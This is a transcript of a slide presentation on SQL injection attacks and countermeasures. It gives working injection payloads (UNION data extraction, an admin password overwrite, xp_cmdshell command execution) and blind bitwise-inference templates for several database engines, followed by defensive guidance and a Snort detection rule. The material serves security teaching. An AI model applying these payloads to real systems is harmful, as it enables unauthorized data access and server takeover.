Web application attacks using Sql injection and countermasures

SQL INJECTION ATTACKS

Cade ZvavanjanjaCISO

Gainful Information Security

Introduction QuestionsBackground Techniques Prevention Demo Conclusions

OUTLINE Background of SQL Injection Techniques and Examples Preventing SQL Injection Demo Wrap-Up Questions


BACKGROUND OF SQL INJECTION


DATABASES: WHERE ARE THEY NOW?

Fat ServerFat Server Fat ClientFat Client Fat Server Fat Server & Fat & Fat ClientClient

MainframesMainframes XXDesktop AppsDesktop Apps XXWeb AppsWeb Apps XX


WHY IS SQL A STANDARD?

Relational Database

Platform Independence Loose

Semantics

Runtime Interpretation


FLEXIBILITY = VULNERABILITYSimple InjectionDecoding Error

MessagesBlind InjectionEncoding ExploitsStored Procedures

- - -Programmer Error

(Faulty Logic)


SQL Injection SQL Injection Techniques Techniques


IMPORTANT SYMBOLS

‘ “Hack”

-- “Comment Out”

; “End Statement”

% , * “Wildcards”

SQL INJECTION DEFINITION

The input field is modified in such a way that the Database returns unintended data.

Sql:SELECT <column name>FROM <Table name>WHERE <logic expression>

EXAMPLE: DATABASE SCHEMA Table Users

Has columns “username” and “password” Accessed when users log in

Table Customers Has column “phone” Users can look up other customer phone

numbers by name Application does no input validation


RETURNING EXTRA ROWS WITH “UNION” Query:

SELECT phone FROM Customers WHERE last_name = ‘<name>’

Input:x’ UNION SELECT username FROM users WHERE ‘x’ = ‘x


MODIFYING RECORDS Application has password changing page SQL: UPDATE users

SET password = ‘<newpassword>’ WHERE username = ‘<username>’

Input: newpassword’ WHERE username LIKE

‘%admin%’ --


MS SQL SERVER Default SQL Server setup

Default system admin account “sa” enabled No password!!!

Supports multiple queries “Extended stored procedures”: C/C++ DLL

files Read/write external files Access command line


EXPLOITING SQL SERVER Use phone look-up query again:

SELECT phone FROM customers WHERE last_name = ‘<name>’

Input:'; exec master..xp_cmdshell

'iisreset'; --


DATA-MINING WITH SQL INJECTION

Three classes of data-mining

In-band

Out-of-band

Inference

IN-BAND ATTACKS Data is included in response from the web

server

Could be a well rendered web page

Using UNION SELECTS

Error messages

OUT-OF-BAND ATTACKS Data is retrieved using another

communication channel:

UTL_HTTP.REQUEST

OPENROWSET

XP_SENDMAIL

INFERENCE ATTACKS At the core of inference is a question Action taken based upon the answer Chris Anley’s time delay:

declare @s varchar(8000)select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) >

0 waitfor delay '0:0:5'

INFERENCE ATTACKS…CONT: Examples:

Time Delay

Generate 200/500 responses

Response Variation

Wildly Silly Example – send mail to tech support of XYZ Corp about modem problem or monitor problem – if the call comes about a modem problem we know the answer

INFERENCE ATTACKS…CONT: CASE statements in SQL:

SELECT CASE WHEN condition THEN do_one_thing ELSE do_another END

INFERENCE THROUGH WEB SERVER RESPONSE CODES Need query that will compile fine but

generate error on branch execution:

SELECT CASE WHEN condition THEN 1 ELSE 1/0 END

INFERENCE THROUGH WEB SERVER RESPONSE CODES…CONT:

Notes: Works well with SQL Server, Oracle, DB2 MySQL returns NULL Informix ODBC driver returns 200 – even in event

of error Response code could be 302 Redirect, etc –

principle is the same. Leaves a large number of 500 response in log

files App Environments like PL/SQL will return 404

instead of 500

INFERENCE THROUGH RESPONSE VARIATIONS: Parameter Splitting and Balancing Avoids 500 responses

PARAMETER SPLITTING AND BALANCING ‘NGSSOFTWARE’

‘NGSSOFTWA’+’RE’ ‘NGSSOFTWA’||’RE’ ‘NGSSOFTWA’|| (SUBSELECT RETURNS R) || ‘E’ ‘NGSSOFTWA’ + (SUBSELECT RETURNS R) + ‘E’

2 1 + 1 1 + (SUBSELECT RETURNS 1)

DEALING WITH VARIOUS APPLICATION ENVIRONMENTS Cold Fusion Management

Converts “ to " Converts & to & Converts > to > Converts < to < Doubles up single quotes

Usually means attack vector is numeric input PHP often doubles single quote – magic

quotes

DEALING WITH VARIOUS APPLICATION ENVIRONMENTS…CONT: Rather than > use BETWEEN X AND Y

Rather than & use ^ A xor BIT = C

if C is greater than A then Bit is not set If C is less than A then Bit is set

Rather than ‘A’ use CHR(65)/CHAR(65)

INFERENCE QUERIES… SQL Server – String data

' + (select case when ascii(substring((sub-

query),the_byte,1))^the_bitbetween 0 and ascii(substring((sub-

query),the_byte,1)) then char(known_value) else char(1/0) end) + '

INFERENCE QUERIES… Oracle – Numeric

+ (select case when bitand(ascii(substr((sub-query),the_byte,1)),

the_bit) between 1 and 255 then 0 else 1/0 end

from dual)

INFERENCE QUERIES… Oracle – String data

'|| (select case when bitand(ascii(substr((sub-query),the_byte,1)),

the_bit) between 1 and 255 then chr(known_val) else

chr(1/0) end from dual) ||'

INFERENCE QUERIES… MySQL – Numeric

+ (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end

(uses page response variation)

INFERENCE QUERIES… MySQL – String Data

' + (select case when (ascii(substring((sub-query),the_byte,1))^the_bit) between 0 and ascii(substring((sub-query),the_byte,1)) then 0 else 1 end) + ‘

(one returns no recordset – the other returns all rows)

INFERENCE QUERIES… Informix – Numeric+ (select distinct case when bitval((SELECT distinct

DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then 1 else (1/bitval(2,1)) end from sysmaster:informix.systables)-1

INFERENCE QUERIES… Informix – String data' || (select distinct case when bitval((SELECT distinct

DECODE((select distinct (substr((sub-query),the_byte,1)) from sysmaster:informix.systables),"{",123,"|",124,"}",125,"~",126,"!",33,"$",36,"(",40,")",41,"*",42,",",44,"-",45,".",46,"/",47," ",32,":",58,";",59,"_",95,"\\",92,".",46,"?",63,"-",45,"0",48,"1",49,"2",50,"3",51,"4",52,"5",53,"6",54,"7",55,"8",56,"9",57,"@",64,"A",65,"B",66,"C",67,"D",68,"E",69,"F",70,"G",71,"H",72,"I",73,"J",74,"K",75,"L",76,"M",77,"N",78,"O",79,"P",80,"Q",81,"R",82,"S",83,"T",84,"U",85,"V",86,"W",87,"X",88,"Y",89,"Z",90,"a",97,"b",98,"c",99,"d",100,"e",101,"f",102,"g",103,"h",104,"i",105,"j",106,"k",107,"l",108,"m",109,"n",110,"o",111,"p",112,"q",113,"r",114,"s",115,"t",116,"u",117,"v",118,"w",119,"x",120,"y",121,"z",122,63) from sysmaster:informix.systables),the_bit) between 1 and 255 then '\xFC' else (1/bitval(2,1))::char end from sysmaster:informix.systables) ||'


PREVENTING SQL INJECTION

PREVENTING SQL INJECTIONInput ValidationInput Checking FunctionsAccess RightsUser PermissionsVariable PlaceholdersStored Procedures


INPUT VALIDATION Checks

Type Size Format Range

Replace quotation marks

“All input is wrong and dangerous”


INPUT CHECKING FUNCTIONS Built in character rejection

$sql = “SELECT * FROM Users WHERE ID = ‘” . $_GET[‘id’] . “’”;

$sql = “SELECT * FROM Users WHERE ID =” . mysql_real_escape_string($_GET[‘id’]);

$result = mysql_query($sql);


ACCESS RIGHTS

Web Uservs.

System Administrator – ‘sa’


USER PERMISSIONS Limit query access rights

SELECT UPDATE DROP

Restricted statement access Global-specific Database-specific Table-specific


VARIABLE PLACEHOLDERS (?) Defense from String Concatenation Enforcing database data types

PreparedStatement prep = conn.prepareStatement("SELECT * FROM USERS WHERE PASSWORD=?");

prep.setString(1, pwd);


STORED PROCEDURES Use error checking variables Buffer direct database access


DEMONSTRATION


COUNTERMEASURESSystem Administrators

White List / Blacklist Input ValidationLeast PrivilegesApplication firewalls

DeveloperStored ProceduresParameterized queriesException handling

WHITELIST INPUT VALIDATION UrlScan v3.0

restricts the types of HTTP requests that IIS will process

SNORT Create rule to check for SQL attack

[SQL Injection Headers]AppliesTo=.asp,.aspx

[SQL Injection Headers Strings]-- @ ; also catches @@alterdeletedropexecinsert

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection "; flow:to_server,established;uricontent:".php | .aspx | .asp";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;)

LEAST PRIVILEGES Enforce least privileges

CREATE / DELETE Does not guarantee security

Access to portion of data Create views

CONCLUSIONS SQL Injection continues to evolve with new

technologies Dangerous Effects

Access to critical information Updating data not meant to be updated Exploiting DBMS to directly affect the server and its resources

Prevention of SQL Injection Input Validation and Query Building Permissions and Access Rights Variable Placeholders (Prepare) and Stored Procedures


QUESTIONS 1) What could prevent the ‘Students’ table from

being dropped?

2) What is another way to prevent Injection?


REFERENCES Achour, Mehdi, Friedhelm Betz, Antony Dovgal, et al. "Chapter

27. Database Security." PHP Manual. 13 January 2005. PHP Documentation Group. 07 Apr. 2005 <http://www.php-center.de/en-html-manual/security.database.sql-

injection.html>. Dewdney, A. K. The New Turing Omnibus. New York: Henry Holt,

1989. 427-433. "Exploits of a Mom." xkcd.com. 4 Mar. 2008

<http://xkcd.com/327/>. Finnigan, Pete. " SQL Injection and Oracle, Part One ."

SecurityFocus 21 November 2002. 07 Apr 2005 <http://www.securityfocus.com/infocus/1644>.

Harper, Mitchell. "SQL Injection Attacks: Are You Safe?." Dev Articles. 29 May. 2002. 07 Apr. 2005

<http://www.devarticles.com/c/a/MySQL/SQL-Injection-Attacks-Are-You-Safe/2/>.

Introduction QuestionsBackground Techniques Prevention Demo Conclusions Questions


Thank You

Tel: +236 733 782 490 +263 773 796 365 +263 -4- 733 117

Eml: [email protected] [email protected]

Web: www.gis.co.zw

Web application attacks using Sql injection and countermasures

Technology

Transcript of Web application attacks using Sql injection and countermasures